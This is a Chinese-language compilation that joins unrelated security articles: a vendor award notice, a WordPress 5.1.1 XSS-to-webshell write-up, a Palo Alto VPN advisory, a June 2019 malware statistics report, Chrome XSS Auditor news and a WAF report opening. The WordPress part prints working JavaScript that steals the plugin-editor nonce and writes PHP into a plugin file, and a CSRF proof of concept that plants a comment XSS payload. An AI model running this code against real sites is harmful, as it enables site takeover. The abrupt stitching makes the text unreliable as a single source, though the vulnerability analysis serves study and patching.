640.gif

今日,以“智能感知态势 携手构建安全”为主题的2019中国网络安全年会在广州召开,大会对第八届CNCERT网络安全应急服务支撑单位进行了表彰。斗象科技凭借着强烈的责任心、专业的技术能力和丰富的服务经验,连续三届荣获“网络安全应急服务支撑单位证书(省级)”。

image.png

作为以技术创新驱动的网络安全提供商,斗象科技的产品及服务已被全球领先企业和顶级投资者认可,拥有近500家核心客户,在金融、互联网、物联网、政府、教育等行业推出了优质服务和创新产品解决方案,是国家互联网应急中心(CNCERT)“省级支撑单位”、国家信息安全漏洞共享平台(CNVD)“漏洞报送突出贡献单位”、国家测评中心“二级支撑单位”、2018年度上海市网络安全工作 “先进支持单位”,也是国家信息技术安全研究中心、公安部第三研究所等国家级行业机构的关键技术支撑单位与重要合作伙伴,曾荣获2016年红鲱鱼全球科技创新100强,亚洲地区唯一上榜的安全企业。

在CNCERT的指导下,斗象科技已成为我国网络安全应急体系的重要组成部分,在事件信息数量、事件采纳数量、采纳率等各项指标排名中均位居前列,为保障网络安全的应急响应和安全事件的分析预警做出了积极贡献,为“十九大”、“金砖会议”、“进博会”等重大国家会议提供网络安全保障支撑,获得中央网信办以及上海市委网信办的高度认可。

未来,斗象科技将再接再厉,加强网络安全资源共享,不断的挑战支撑力量的强度和技术服务能力。斗象科技将继续发扬拼搏精神,不忘初心,砥砺前行,为我国网络安全应急体系贡献力量。

WordPress安全机制与XSS写shell

nonce机制

在WordPress中,对不同操作都做了nonce检测机制,以防CSRF攻击。
nonce值的生成:

$expected = substr( wp_hash( $i . '|' . $action . '|' . $uid . '|' . $token, 'nonce'), -12, 10 );

其中,$i是由时间决定的随机数,每天的0时与12时更新一次;$action是操作;$uid是用户id;$token是用户登陆时服务器产生的,每次登陆都不同。
由此可见,nonce可以很好地避免CSRF等漏洞的产生。

后台账户重要性

WordPress认为,后台管理员是有安全意识的,而且不会被盗。所以在WordPress的后台没有XSS过滤;甚至可以通过插件编辑器直接写入webshell。

XSS后台写shell

· 有了nonce机制并且给后台用户较大的权限时,就可以通过XSS直接写入webshell。

· 利用后台管理员可以通过编辑插件写入任意代码这个特点,我们可以构造写入任意代码的JS。 可以获取webshell的JS脚本为(测试环境:WordPress5.1.1,不同版本的参数可能不同,需要抓包重写):

<html>
<script>
p = 'wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
s = '<?php phpinfo();';
 
a = new XMLHttpRequest();
a.open('GET', p+q, 0);
a.send();
 
$ = 'nonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] +
'&newcontent=' + s + '&action=edit-theme-plugin-file&' + q +'&plugin=hello.php';
 
b = new XMLHttpRequest();
b.open('POST', p+q, 1);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
 
b.onreadystatechange = function(){
   if (this.readyState == 4) {
      fetch('wordpress/wp-content/plugins/hello.php');
   }
}
</script>
 
</html>

漏洞复现

由于我复现的时候 5.1.1已经被修复了,贴一个找到的未修复的commit: https://codeload.github.com/WordPress/WordPress/zip/df681b2ee0c01c3282f07feaed0b498546c87be3

· 安装完WordPress并使用管理员登陆后,进入评论使用burp构造CSRFpayload:

<a title=' " onmouseover=alert(1) attr2=" ' rel='1'>click

· 生成的POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:801/cms/wordpress-5.1.1/wordpress/wp-comments-post.php" method="POST">
      <input type="hidden" name="comment" value="<a title=' " onmouseover=alert(1) attr2=" ' rel='1'>click" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="comment_post_ID" value="1" />
      <input type="hidden" name="comment_parent" value="0" />
      <input type="hidden" name="_wp_unfiltered_html_comment" value="no_need_correct" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

· 管理用户访问POC后,会产生一个a标签并注入js代码,执行效果:

图片16.png

 图片17.png

· 此时,就可以执行写shell的JS代码,达到getshell的目的。

漏洞分析

再次看看前面的payload:

<a title=' " onmouseover=alert(1) attr2=" ' rel='1'>click

需要注意的是:a后的第一个属性必须为$allowedposttags白名单中的属性,如title、id等,否则WordPress会直接去掉该属性。 查看全局允许的属性名:

图片18.png

由于之前的操作繁琐(主要是评论的各种过滤),直接在漏洞修复处打断点:

function wp_rel_nofollow_callback( $matches ) {
$text = $matches[1];
$atts = shortcode_parse_atts( $matches[1] );
$rel  = 'nofollow';
 
if ( preg_match( '%href=["\'](' . preg_quote( set_url_scheme( home_url(), 'http' ) ) . ')%i', $text ) ||
preg_match( '%href=["\'](' . preg_quote( set_url_scheme( home_url(), 'https' ) ) . ')%i', $text ) ) {
 
return "<a $text>";
}
 
if ( ! empty( $atts['rel'] ) ) { //rel属性不为空时
$parts = array_map( 'trim', explode( ' ', $atts['rel'] ) );
if ( false === array_search( 'nofollow', $parts ) ) {
$parts[] = 'nofollow';
}
$rel = implode( ' ', $parts );
unset( $atts['rel'] );
 
$html = '';
foreach ( $atts as $name => $value ) {
$html .= "{$name}=\"$value\" "; //注意此处对每个属性的值添加双引号
}
$text = trim( $html );
}
return "<a $text rel=\"$rel\">";
}

可以很明显的注意到,在调用解析rel属性的函数时,如果存在rel属性,首先将解析的每一个属性直接拼接进去并且加上双引号。
WordPress对属性的解析与浏览器的解析一致,大致如下:

1. 外界为双引号,则把双引号内字符串解析为属性而不会加转义。

2. 外界为单引号,则把单引号内字符串解析为属性而不会加转义。

而在此处,如果单引号中包含双引号,解析时被当做属性,自然不会转义,而最后却被包裹上了双引号,从而造成闭合,原本在属性中的恶意代码被解析:

<a title=' " onmouseover=alert(1) attr2=" ' rel='1'>click
->
<a title=" " onmouseover=alert(1) attr2=" " rel="1">click

最后输出的结果为:

<a title=" " onmouseover="alert(1)" attr2=" " rel="1 nofollow">click</a>

从而造成XSS

修复分析

针对此漏洞的修复主要有两个:
第一处:

图片19.png 

可以看到使用esc_attr函数对属性进行转义了。

第二处:

图片20.png 

第二处修补使用wp_filter_kses代替了wp_filter_post_kses。 首先查看wp_filter_post_kses:

function wp_filter_post_kses( $data ) {
return addslashes( wp_kses( stripslashes( $data ), 'post' ) );
}
 
跟进->
 
function wp_kses( $string, $allowed_html, $allowed_protocols = array() ) {
if ( empty( $allowed_protocols ) ) {
$allowed_protocols = wp_allowed_protocols();
}
$string = wp_kses_no_null( $string, array( 'slash_zero' => 'keep' ) );
$string = wp_kses_normalize_entities( $string );
$string = wp_kses_hook( $string, $allowed_html, $allowed_protocols );
return wp_kses_split( $string, $allowed_html, $allowed_protocols ); //注意此处
}

可以看到,该函数主要是基于$allowed_html对string进行了过滤。

再查看wp_filter_kses:

function wp_filter_kses( $data ) {
return addslashes( wp_kses( stripslashes( $data ), current_filter() ) );
}

同样地,使用了wp_kses函数,不同的是这次传入的是current_filter(),其中关键的过滤功能在函数wp_kses_split中,跟进:

function wp_kses_split( $string, $allowed_html, $allowed_protocols ) {
global $pass_allowed_html, $pass_allowed_protocols;
$pass_allowed_html      = $allowed_html;
$pass_allowed_protocols = $allowed_protocols;
return preg_replace_callback( '%(<!--.*?(-->|$))|(<[^>]*(>|$)|>)%', '_wp_kses_split_callback', $string );
}
跟进_wp_kses_split_callback->
 
function _wp_kses_split_callback( $match ) {
global $pass_allowed_html, $pass_allowed_protocols;
return wp_kses_split2( $match[0], $pass_allowed_html, $pass_allowed_protocols );
}
 
跟进wp_kses_split2->
 
function wp_kses_split2( $string, $allowed_html, $allowed_protocols ) {
$string = wp_kses_stripslashes( $string );
...
if ( ! is_array( $allowed_html ) ) {
$allowed_html = wp_kses_allowed_html( $allowed_html );
}
...
}
 
跟进wp_kses_allowed_html->
 
function wp_kses_allowed_html( $context = '' ) {
global $allowedposttags, $allowedtags, $allowedentitynames;
...
switch ( $context ) {
case 'post':
$tags = apply_filters( 'wp_kses_allowed_html', $allowedposttags, $context );
 
if ( ! CUSTOM_TAGS && ! isset( $tags['form'] ) && ( isset( $tags['input'] ) || isset( $tags['select'] ) ) ) {
$tags = $allowedposttags;
 
$tags['form'] = array(
'action'         => true,
'accept'         => true,
'accept-charset' => true,
'enctype'        => true,
'method'         => true,
'name'           => true,
'target'         => true,
);
$tags = apply_filters( 'wp_kses_allowed_html', $tags, $context );
}
 
return $tags;
 
case 'user_description':
case 'pre_user_description':
$tags             = $allowedtags;
$tags['a']['rel'] = true;
return apply_filters( 'wp_kses_allowed_html', $tags, $context );
 
case 'strip':
return apply_filters( 'wp_kses_allowed_html', array(), $context );
 
case 'entities':
return apply_filters( 'wp_kses_allowed_html', $allowedentitynames, $context );
 
case 'data':
default:
return apply_filters( 'wp_kses_allowed_html', $allowedtags, $context );
}

可以看到,传入post时,使用$allowedposttags过滤;传入current_filter()解析出的pre_comment_content时则进入default,使用$allowedtags过滤。 这两个数组都是全局变量,$allowedposttags中包括各种标签,其中就包括a以及其rel属性:

'a'          => array(
'href'     => true,
'rel'      => true,
'rev'      => true,
'name'     => true,
'target'   => true,
'download' => array(
'valueless' => 'y',
),
)

而$allowedtags比$allowedposttags严格的多,其中a标签的内容如下:

'a'          => array(
'href'  => true,
'title' => true,
)

所以,第二个修复点其实是把标签白名单缩小了,不允许rel的出现。

参考资料

· https://www.bynicolas.com/code/wordpress-nonce/

· https://brutelogic.com.br/blog/compromising-cmses-xss/

· https://lorexxar.cn/2017/08/23/xss-tuo/

· https://lorexxar.cn/2019/03/14/wp5-1-1xss/

一、前言

Palo Alto GlobalProtect SSL VPN是企业常用的SSLVPN产品,近期公开了一个远程代码执行漏洞。

二、漏洞简介

Palo Alto GlobalProtect SSL VPN在/sslmgr位置存在格式化字符串漏洞,存在远程代码执行风险。

网藤CRS/ARS产品已全面支持该漏洞的检测与验证,网藤用户可直接登陆www.riskivy.com进行验证。

三、漏洞危害

经斗象安全应急响应团队分析,通过特殊文件检查Palo Alto GlobalProtect SSL VPN版本信息,发现互联网存在大量的Palo Alto GlobalProtect SSL VPN服务器,其中未修补漏洞的服务器占比四成左右,这些服务器都存在远程代码执行风险。

图片 1.png

四、影响范围

产品

Palo Alto GlobalProtect SSL VPN

版本

Palo Alto GlobalProtect SSL VPN 7.1.x <7.1.19

Palo Alto GlobalProtect SSL VPN 8.0.x <8.0.12

Palo Alto GlobalProtect SSL VPN 8.1.x <8.1.3

组件

Palo Alto GlobalProtect SSL VPN

五、修复方案

1.升级Palo Alto GlobalProtect SSL VPN到 7.1.19, 8.0.12, 8.1.3;

2.暂时关闭/sslmgr路径对外开放。

六、参考

https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html?m=1

以上是本次高危漏洞预警的相关信息,如有任何疑问或需要更多支持,可通过以下方式与我们取得联系。

联系电话:400-156-9866

Email:[email protected]

一、网络安全状况概述

2019年6月,互联网网络安全状况整体指标平稳,但是有两个重要特征值得关注。

一方面,病毒攻击态势呈上升趋势,整体较上月增加7%。其中挖矿病毒活跃程度增加较多,其病毒攻击的拦截量较5月增加11%,安全防护薄弱的企业是主要受灾对象,教育行业、政企单位的感染程度也有所增加。挖矿病毒的近期活跃程度增加可能与比特币价格持续走高有关。

另一方面,多个严重漏洞披露。Microsoft在官方安全更新公告中一共披露了88个漏洞的相关信息,其中21个获得了“严重”评级,这是微软有史以来漏洞严重程度最高的一次排名。Oracle官方安全公告中披露了高危漏洞(漏洞编号:CVE-2019-2729),WebLogic 远程命令执行漏洞。Adobe Coldfusion公布了Coldfusion软件中存在的一个远程代码执行漏洞(漏洞编号:CVE-2019-7839),漏洞等级严重。Netflix公司已经确定了几个TCP网络FreeBSD 和Linux内核中的漏洞,其中最严重的是Linux 内核中TCP SACK机制远程拒绝服务漏洞。深信服已针对严重漏洞发布了相应预警,及时提醒用户进行补丁升级,做好安全防护措施。

6月,深信服安全云脑累计发现:

恶意攻击19.05亿次,平均每天拦截恶意程序6350万次。

活跃恶意程序29111个,其中感染型病毒5487个,占比18.85%;木马远控病毒13459个,占比46.23%。挖矿病毒种类541个,拦截次数10.46亿次,较5月上升11%,其中WannaMine病毒家族最为活跃。

深信服网站安全监测平台对国内已授权的5661个站点进行漏洞监控,发现:

高危站点2721个,高危漏洞24495个,漏洞类别主要是CSRF跨站请求伪造,占比88%。

监控在线业务6724个,共识别潜在篡改的网站有179个,篡改总发现率高达2.66%。

二、恶意程序活跃详情

2019年6月,病毒攻击在6月呈现上升态势,病毒拦截量比5月份(17.9亿次)上升近7%,近半年拦截恶意程序数量趋势如下图所示:

图片1.png

2019年6月,深信服安全云脑检测到活跃恶意程序样本29111个,其中木马远控病毒13459个,占比46.23%;蠕虫病毒7461个,占比25.63%;感染型病毒5487个,占比18.85%;勒索病毒632个,占比2.17%;挖矿病毒541个,占比1.86%。

6月总计拦截恶意程序19.05亿次,其中挖矿病毒的拦截量占比54.92%,其次是木马远控病毒(16.24%)、蠕虫病毒(11.29%)、感染型病毒(8.48%)、后门软件(8.04%)、勒索病毒(0.88%)。

图片2.png

2.1 勒索病毒活跃状况

2019年6月,共拦截勒索病毒攻击1667万次。其中,WannaCry、GlobeImposter、GandCrab依然是最活跃的几个勒索病毒家族,其中WannaCry家族6月拦截数量803万次,危害依然较大。

从勒索病毒倾向的行业来看,企业和政府感染病毒数量占总体的60%,是黑客攻击的最主要的攻击对象,具体活跃病毒行业分布如下图所示:

图片3.png

从勒索病毒受灾地域上看,广东地区受感染情况最为严重,其次是浙江省和北京市。

图片4.png

2.2 挖矿病毒活跃状况

 2019年6月,深信服安全云脑共拦截挖矿病毒10.46亿次,其中最为活跃的挖矿病毒是WannaMine、Xmrig,特别是WannaMine家族,共拦截4.43亿次。同时监测数据显示,被挖矿病毒感染的地域主要有广东省、北京市、浙江省等地,其中广东省感染量第一。

图片5.png

被挖矿病毒感染的行业分布如下图所示,其中企业受挖矿病毒感染情况最为严重,其次是政府和教育行业。

图片6.png

2.3 感染型病毒活跃状况

 2019年6月,深信服安全云脑检测并捕获感染型病毒样本5487个,共拦截1.61亿次。其中Virut家族是成为6月攻击态势最为活跃的感染型病毒家族,共被拦截1.04亿次,此家族占了所有感染型病毒拦截数量的64.40%;而排名第二第三的是Sality和Wapomi家族,6月拦截比例分别是为22.18%和4.43%。6月感染型病毒活跃家族TOP榜如下图所示:

图片7.png

在感染型病毒危害地域分布上,广东省(病毒拦截量)位列第一,占TOP10总量的33%,其次为广西壮族自治区和浙江省。

图片8.png

从感染型病毒攻击的行业分布来看,黑客更倾向于使用感染型病毒攻击企业、教育、科研教育等行业。企业、教育、科研教育的拦截数量占感染型病毒拦截总量的67%,具体感染行业分布如下图所示:

图片9.png

2.4 木马远控病毒活跃状况

深信服安全云脑本月检测到木马远控病毒样本13459个,共拦截3.09亿次。其中最活跃的木马远控家族是Drivelife,拦截数量达7163万次,其次是Zusy、Siscos。具体分布数据如下图所示:

图片10.png

对木马远控病毒区域拦截量进行分析统计发现,恶意程序拦截量最多的地区为广东省,占TOP10拦截量的24%;其次为北京市(12%)、广西壮族自治区(11%)、浙江省(11%)和山东省(8%)。此外湖南省、四川省、上海市、湖北省、江苏省的木马远控拦截量也排在前列。

图片11.png

行业分布上,企业、教育及政府行业是木马远控病毒的主要攻击对象。

图片12.png

2.5 蠕虫病毒活跃状况

2019年6月深信服安全云脑检测到蠕虫病毒样本7461个,共拦截2.15亿次,但通过数据统计分析来看,大多数攻击都是来自于Ramnit、Gamarue、Jenxcus、Dorkbot、Faedevour、Morto、Small家族,这些家族占据了6月全部蠕虫病毒攻击的94%,其中攻击态势最活跃的蠕虫病毒是Ramnit,占蠕虫病毒TOP10总量的50%。

图片13.png

从感染地域上看,广东省地区用户受蠕虫病毒感染程度最为严重,其拦截量占TOP10总量的30%;其次为湖南省(15%)、浙江省(11%)。

图片14.png

从感染行业上看,企业、教育等行业受蠕虫感染程度较为严重。

图片15.png

三、网络安全攻击趋势分析

深信服全网安全态势感知平台监测到全国32631个IP在6月所受网络攻击总量约为7.7亿次。6月攻击态势较上月有小幅上升。下图为近半年深信服网络安全攻击趋势监测情况:

图片16.png

3.1 安全攻击趋势

下面从攻击类型分布和重点漏洞攻击分析2个纬度展示6月现网的攻击趋势:

(1)攻击类型分布

通过对深信服安全云脑日志数据分析可以看到,6月捕获攻击以WebServer漏洞利用、系统漏洞利用、Web扫描、信息泄露、Webshell上传、数据库漏洞利用等分类为主。其中WebServer漏洞利用类型的占比更是高达67.50%,攻击次数达5亿多次;系统漏洞利用类型均占比13.70%。

主要攻击种类和比例如下:

图片17.png

(2)重点漏洞攻击分析

通过对深信服安全云脑日志数据分析,针对漏洞的攻击情况筛选出6月攻击利用次数最高的漏洞TOP20。

其中漏洞被利用次数前三的漏洞分别是Apache HTTP Server mod_log_config 远程拒绝服务漏洞(保持不变)、NetBIOS名称查询响应漏洞和Nginx URI Processing安全绕过漏洞,命中次数分别为423,215,695、29,664,036和29,612,680。较5月均有上升。

图片18.png

3.2 高危漏洞攻击趋势跟踪

深信服安全团队对重要软件漏洞进行深入跟踪分析,近年来Java中间件远程代码执行漏洞频发,同时受永恒之蓝影响使得Windows SMB、Struts2和Weblogic漏洞成为黑客最受欢迎的漏洞攻击方式。

2019年6月,Windows SMB日志量达千万级,近几月攻击持上升趋势,其中拦截到的(MS17-010)Microsoft Windows SMB Server 远程代码执行漏洞攻击利用日志最多;Struts2系列漏洞本月攻击次数较前几月下降,Weblogic系列漏洞的攻击总体程波动状态,但近三个月较为平缓,本月仅拦截不到二十万攻击日志;PHPCMS系列漏洞攻击次数较上月下降。

(1)Windows SMB 系列漏洞攻击趋势跟踪情况

图片19.png

(2)Struts2系列漏洞攻击趋势跟踪情况

图片20.png

(3)Weblogic系列漏洞攻击趋势跟踪情况

图片21.png

(4)PHPCMS系列漏洞攻击趋势跟踪情况

图片22.png

四、网络安全漏洞分析

4.1 全国网站漏洞类型统计

深信服网站安全监测平台6月对国内已授权的8764个站点进行漏洞监控,近一个月内发现的高危站点5237个,高危漏洞149267个,漏洞类别主要是CSRF跨站请求伪造,XSS注入和信息泄露,总占比83%,详细高危漏洞类型分布如下:

图片23.png

具体比例如下:

图片24.png

4.2 篡改情况统计

6月总监控在线业务7260个(去重),共识别潜在篡改的网站有140个(去重),篡改总发现率为19.2%。

其中首页篡改25个,二级页面篡改56个,多级页面篡改36个。

具体分布图如下图所示:

图片25.png

上图可以看出,网站二级篡改为篡改首要插入位置,成为黑客利益输出首选。

五、近期流行攻击事件及安全漏洞盘点

5.1 流行攻击事件

(1)建筑行业出现集中式感染CrySiS勒索病毒

近日,深信服接到多个建筑行业客户反馈,服务器被加密勒索,经过跟踪分析,拿到了相应的样本,确认样本为CrySiS勒索病毒jack变种。截止目前,黑产团队多次通过社会工程、RDP暴力破解等方式有针对性的入侵建筑行业,提醒该行业客户提高警惕。

具体详见:https://mp.weixin.qq.com/s/aoR2eFtRi9K2rUNJQMX3Hg

(2)GoldBrute僵尸网络横空出世

近日,当黑客们还在绞劲脑汁地想着如何使用BlueKeep漏洞俘获肉鸡时,一个僵尸网络病毒突然横空出世,对全球1,500,000+个设备进行扫描。该病毒名为GoldBrute,通过传统的RDP爆破方式进行传播,被该病毒感染的主机会受C&C服务器104.156.249.231所操控。

具体详见:https://mp.weixin.qq.com/s/ajQB_BT5TGkWMOXlKcj1Tg

(3)Bluehero挖矿蠕虫变种空降!

近日,深信服安全团队捕获到Bluehero挖矿蠕虫最新变种,该挖矿蠕虫集多种功能为一体,释放后门程序窃取主机信息,释放Mimikatz模块、嗅探模块、“永恒之蓝”攻击模块、LNK漏洞利用模块(CVE-2017-8464)进行传播和反复感染,最终释放挖矿模块进行挖矿。

具体详见:https://mp.weixin.qq.com/s/9SKd24-zvZBm4UICEBjXKQ

(4)GandCrab最终版解密工具发布!

 6月17日,Bitdefender发布了GandCrab勒索病毒V1、V4以及V5-V5.2版本的解密工具,这意味着不向勒索软件运营商妥协的受害者们,终于可以恢复被加密的数据。

具体详见:https://mp.weixin.qq.com/s/6s1X_hwjhmwFnrm19Hd2lQ

5.2 安全漏洞事件

(1)Vim编辑器本地代码执行漏洞预警(CVE-2019-12735)

Vim编辑器在8.1.1365和Neovim 0.3.6 之前版本存在严重的代码执行漏洞,当通过Vim编辑器打开特殊构造的文件,且Vim编辑器的ModelLine被启用,就会触发本地文件代码执行漏洞。虽然此漏洞是本地漏洞,如若结合社会工程学的方式进行攻击,危害不容小觑,容易造成重要敏感信息泄露,甚至会导致服务器被攻击者控制。

具体详见:https://mp.weixin.qq.com/s/I1QXoD_617rJt8xSE5-s9w

(2)微软六月补丁日重点漏洞预警

2019年6月11日,Microsoft发布了六月份安全补丁更新。在官方的安全更新公告中一共披露了88个漏洞的相关信息,其中21个获得了“严重”评级,这是微软有史以来漏洞严重程度最高的一次排名。截至目前为止,尚未发现这88个漏洞的在野利用。

具体详见:https://mp.weixin.qq.com/s/rmqwIqA66VWURYHpnvdYkw

(3)【漏洞预警】Coremail 多版本配置文件读取漏洞

在2019年6月14日,Coremail 配置文件读取漏洞PoC爆出,经过深信服安全研究员验证分析,发现利用该漏洞能够读取Coremail 邮件服务器敏感配置文件,配置文件中包括邮件服务存储路径、数据库连接地址、账号以及密码等敏感信息,该漏洞危害较大,影响较广。

具体详见:https://mp.weixin.qq.com/s/vihgyx9YLILMNGayIXr-bw

(4)【漏洞预警】Oracle WebLogic 远程命令执行 0day(CVE-2019-2725补丁绕过)漏洞

近日,深信服安全团队发现了在野的 Oracle WebLogic 远程命令执行漏洞最新利用方式,该漏洞的利用方式与官方 4 月修复的CVE-2019-2725漏洞利用方式极为相似,此攻击可以绕过官方四月份发布的安全补丁。

具体详见:https://mp.weixin.qq.com/s/8Kvk1-WJ5j0vBw2SU3w7Og

(5)【更新】CVE-2019-1040 Windows NTLM篡改漏洞分析

2019年6月11日,Microsoft发布了六月份安全补丁更新。在该安全更新补丁中,对CVE-2019-1040漏洞进行了修复。攻击者利用该漏洞可以绕过NTLM中的MIC(Message Integrity Code)。攻击者可以修改已经协商签名的身份验证流量,然后中继到另外一台服务器,同时完全删除签名要求。通过该攻击方式可使攻击者在仅有一个普通域账号的情况下,运程控制域中任意机器(包括域控服务器)。

具体详见:https://mp.weixin.qq.com/s/OuDsXvwBiPa87QVH73ZzbQ

(6)【漏洞预警】Linux 内核中TCP SACK机制远程拒绝服务漏洞

近日,Netflix公司已经确定了几个TCP网络FreeBSD 和Linux内核中的漏洞。这些漏洞特别涉及最小段大小(MSS)和TCP选择性确认(SACK)功能。最严重的,被称为“SACK Panic”,可以在Linux内核上远程触发内核崩溃,从而影响系统的可用性。

具体详见:https://mp.weixin.qq.com/s/JGwbpxd18Eec7EZ1CqYHfQ

(7)【更新】Oracle WebLogic 远程命令执行(CVE-2019-2729)漏洞预警

近日,Oracle官方安全公告中披露了 CVE-2019-2729 WebLogic 远程命令执行漏洞。漏洞定级为 High,属于高危漏洞。该漏洞本质是由于 wls9-async组件在反序列化处理输入信息时存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。

具体详见:https://mp.weixin.qq.com/s/IDQqJbgCXomw5H7SQvkcFg

(8)【漏洞预警】WebSphere远程代码执行漏洞

近日,metasploit团队更新了WebSphere远程代码执行漏洞(CVE-2019-4279)的检测方式。由于服务器在进行反序列化操作时并没有对数据进行安全验证,攻击者可以构造恶意的序列化数据,在服务器执行反序列化操作时执行内部包含的命令,实现远程代码执行漏洞的利用。

具体详见:https://mp.weixin.qq.com/s/MXIo73wrVDgXutkoZVILkw

(9)【漏洞预警】Coldfusion 远程代码执行漏洞(CVE-2019-7839)

近日,Adobe Coldfusion官方修复了Coldfusion软件中存在的一个远程代码执行漏洞,漏洞编号:CVE-2019-7839,该漏洞评分10分,漏洞等级严重,该漏洞影响范围较广,危害性较大,攻击者可以通过JNBridge技术不受限制地访问远程Java运行时环境,从而允许执行任意代码和系统命令。

具体详见:https://mp.weixin.qq.com/s/ny4NFTtjQxelVegO0rbB9Q

六、安全防护建议

黑客入侵的主要目标是存在通用安全漏洞的机器,所以预防病毒入侵的主要手段是发现和修复漏洞,深信服建议用户做好以下防护措施:

(一)、杜绝使用弱口令,避免一密多用

系统、应用相关的用户杜绝使用弱口令,同时,应该使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,禁止密码重用的情况出现,尽量避免一密多用的情况。

(二)、及时更新重要补丁和升级组件

建议关注操作系统和组件重大更新,如永恒之蓝漏洞,使用正确渠道,如微软官网,及时更新对应补丁漏洞或者升级组件。

(三)、部署加固软件,关闭非必要端口

服务器上部署安全加固软件,通过限制异常登录行为、开启防爆破功能、防范漏洞利用,同时限制服务器及其他业务服务网可进行访问的网络、主机范围。有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,提高系统安全基线,防范黑客入侵。

(四)、主动进行安全评估,加强人员安全意识

加强人员安全意识培养,不要随意点击来源不明的邮件附件,不从不明网站下载软件,对来源不明的文件包括邮件附件、上传文件等要先杀毒处理。定期开展对系统、应用以及网络层面的安全评估、渗透测试以及代码审计工作,主动发现目前系统、应用存在的安全隐患。

(五)、建立威胁情报分析和对抗体系,有效防护病毒入侵

网络犯罪分子采取的战术策略也在不断演变,其攻击方式和技术更加多样化。对于有效预防和对抗海量威胁,需要选择更强大和更智能的防护体系。

XSS Auditor在阻止XSS攻击方面效率太低,而且需要花大力气来维护。为此,Google将删除Chrome内置的XSS保护。谷歌工程师计划删除一项Chrome安全功能,该功能一直与多年来提供的保护措施不相符。

这款名为XSS Auditor的功能是在2010年随着Google Chrome v4的发布而添加到Chrome中的。顾名思义,XSS Auditor负责扫描网站的源代码,寻找类似跨站点脚本(XSS)攻击的模式,这种攻击可能试图在用户的浏览器中运行恶意代码。

如果找到已知的XSS模式,Chrome可能会删除恶意代码,或者可能阻止网站完全加载,显示如下所示的错误。

xssauditor-error.png

多年来,XSS Auditor一直是浏览器保护领域的一个独特功能,并帮助Chrome从其他浏览器中脱颖而出,成为唯一一个内置XSS保护功能的浏览器。

自XSS Auditor推出以来,其他浏览器也通过附件扩展了该功,其中最着名的是NoScript扩展,它多年来一直具有XSS保护机制。

不过,XSS Auditor现在漏洞百出。在7月15日,谷歌工程师宣布了删除Chrome中的XSS Auditor的计划。

工程师列举了删除该功能的几个原因,其中最主要的原因就是过去几年发现XSS Auditor绕过方法太多了。虽然XSS Auditor在刚刚推出之后反响很好,但现在它却成了一个笑话,以至于有人开玩笑说,如果你还没有在XSS Auditor发现过一个绕过方法,那就不算是真正的安全研究人员。经过实际测试,在短短的两分钟内,ZDNet就发现十个绕过XSS Auditor的方法。

此外,修补XSS Auditor绕过漏洞的过程本身也已经给Chrome带来了很多攻击面。Chrome工程师托马斯•塞佩兹表示:

“XSS Auditor已经引入了许多跨站点信息泄漏,并且修复所有信息泄漏已经证明是困难的。”

另外,XSS Auditor还有大量误报的问题,它根据错误检测而阻止合法站点的访问情况最近经常出现。这就是为什么随着Chrome 74的发布,Google将默认的XSS Auditor模式从“阻止”切换为“过滤”,这意味着自4月以来,XSS Auditor一直没有执行阻止访问包含XSS代码的网站,而是删除了代码,试图减少其工程师所获得的误报报告的数量。

XSS Auditor将被可信类型API替换

去年10月,Google就已经开始着手弃用XSS Auditor组件。不过目前谷歌尚未指定哪些Chrome版本将禁用XSS Auditor,并最终从Chrome代码库中将其删除。

好消息是,谷歌已经找到了备用方案。今年2月,谷歌宣布其工程师开发了可信类型浏览器API,这是对基于DOM的XSS攻击的新防御策略,他们声称这将彻底杜绝DOM XSS(DOM型跨站脚本攻击)

与作为Chrome组件的XSS Auditor不同,新的可信类型API是一种Web标准,理论上也可以其他浏览器也可以使用该标准。

Impervahttps://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/在今年1月发布的一份报告显示,XSS漏洞是2014年、2015年、2016年和2017年最常见的网络攻击形式。它们是去年第二大最常见的基于web的攻击形式。

因为它们并不总是对访问站点的用户造成直接损害,公司和安全专家经常忽略XSS漏洞。然而,它们往往是复杂的漏洞利用的攻击起始点,可以促进更具破坏性的攻击。在许多情况下,彻底杜绝XSS攻击可以使用户免受更复杂的攻击,如果没有XSS提供的初始攻击点,这些攻击是不可能发生的。

除了Chrome之外,另外两个使用XSS过滤器的浏览器是Internet Explorer和Edge。 Microsoft去年已经从Edge中删除了XSS过滤器,并引用了内容安全策略等现代标准,事实证明这可以更有效地在网站层面阻止XSS攻击。

Web应用安全依然是互联网安全的最大威胁来源之一,除了传统的网页和APP,API和各种小程序也作为新的流量入口快速崛起,更多的流量入口和更易用的调用方式在提高web应用开发效率的同时也带来了更多和更复杂的安全问题。

一方面,传统的SQL注入、XSS、CC攻击等传统攻击手段和各种新爆出的web漏洞无时无刻不在考验着web应用安全方案的健壮性、灵活性和安全团队的快速反应能力,另一方面随着大数据技术和流量产业的成熟,互联网中来自自动化程序的流量占比也在迅速增长,爬虫也随之成为一个不容忽视的存在,伴随而来的数据泄露、流量作弊等问题也为各类业务带来了非常头痛的费用浪费、业务不可用以及各类业务安全类问题。

作为防御Web应用安全的基础设施,Web应用防火墙(WAF)依旧扮演着极其重要的角色,而其中云WAF又具备漏洞响应快、功能迭代迅速、支持弹性扩容、快速容灾等优势。

本报告根据阿里云WAF和防爬团队对2019年上半年云上流量的分析情况,为您带来最新的攻击趋势、漏洞应急情况以及一线安全专家的核心观点和防护建议。

报告发现:

1. 90%以上攻击流量来源于扫描器

扫描器往往是攻击者的开路利器,在大规模批量扫描中被嗅探到大量漏洞的web站点更容易成为攻击者下手的对象。通过特征、行为等维度识别并拦截扫描器请求,可以有效降低网站被攻击者盯上的概率,同时有效缓解批量扫描行为带来的负载压力。

